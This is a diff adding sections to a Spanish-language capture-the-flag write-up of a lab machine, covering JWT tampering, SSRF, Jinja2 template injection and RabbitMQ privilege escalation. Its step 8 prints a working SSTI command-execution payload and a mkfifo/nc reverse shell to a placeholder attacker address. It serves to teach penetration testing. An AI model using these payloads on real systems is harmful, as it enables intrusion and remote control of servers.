--- a/writeup/rabbit.html
+++ b/writeup/rabbit.html
@@ -58,4 +58,50 @@
     <h2>🧱 4. Fuzzing de endpoints en la API</h2>
     <p>Realicé un escaneo de rutas en <code>/api</code> con ffuf:</p>
     <pre><code>ffuf -u http://storage.cloudsite.thm/api/FUZZ -w raft-small-words-lowercase.txt -fc 404</code></pre>
-    <p>Esto reveló <code>/uploads</code> y <code>/docs</code
+    <p>Esto reveló <code>/uploads</code> y <code>/docs</code>, ambos accesibles sólo con autenticación.</p>
+  </div>
+
+  <div class="section">
+    <h2>🧬 5. JWT alterado = acceso desbloqueado</h2>
+    <p>Con el JWT modificado, accedí a nuevas funcionalidades, como un panel de subida de archivos con opción por URL externa.</p>
+  </div>
+
+  <div class="section">
+    <h2>🧿 6. SSRF (Server-Side Request Forgery)</h2>
+    <p>Probé subir una URL interna apuntando a <code>http://127.0.0.1:3000/api/docs</code> y conseguí acceso al backend, saltándome el proxy externo.</p>
+  </div>
+
+  <div class="section">
+    <h2>🤖 7. Descubrimiento de endpoint vulnerable</h2>
+    <p>Encontré <code>/api/fetch-messeges.from.chatbot</code> aceptando peticiones POST. Al enviar <code>username=admin</code> vi que el input se reflejaba.</p>
+    <p>Probé SSTI con <code>{{7*7}}</code> y obtuve un error de <code>Jinja2</code>, confirmando la vulnerabilidad.</p>
+  </div>
+
+  <div class="section">
+    <h2>⚙️ 8. Ejecución remota (RCE)</h2>
+    <p>Inyecté esta carga útil para ejecutar comandos:</p>
+    <pre><code>{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}</code></pre>
+    <p>Funcionó. Luego lancé una reverse shell:</p>
+    <pre><code>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc MI.IP.443 >/tmp/f</code></pre>
+    <p>Y obtuve acceso remoto como usuario limitado.</p>
+  </div>
+
+  <div class="section">
+    <h2>🧗 9. Escalada de privilegios con RabbitMQ</h2>
+    <p>Encontré una cookie Erlang en <code>/var/lib/rabbitmq</code> y usé <code>rabbitmqctl</code> para listar usuarios:</p>
+    <pre><code>rabbitmqctl --cookie COOKIE --node rabbit@rabbit-forge list_users</code></pre>
+    <p>Uno de ellos usaba una contraseña codificada en Base64.</p>
+  </div>
+
+  <div class="section">
+    <h2>🔓 10. Decodificación de hash y acceso root</h2>
+    <p>Decodifiqué el hash con un script en Python para extraer el SHA-256 de la contraseña, accedí como root y terminé la máquina.</p>
+  </div>
+
+  <div class="section">
+    <h2>✅ Conclusión</h2>
+    <p>Una máquina muy completa, con uso de JWT, SSRF, SSTI y RCE. También incluyó escalada mediante RabbitMQ mal configurado. Ideal para reforzar el pentesting web + post-explotación.</p>
+  </div>
+
+</body>
+</html>
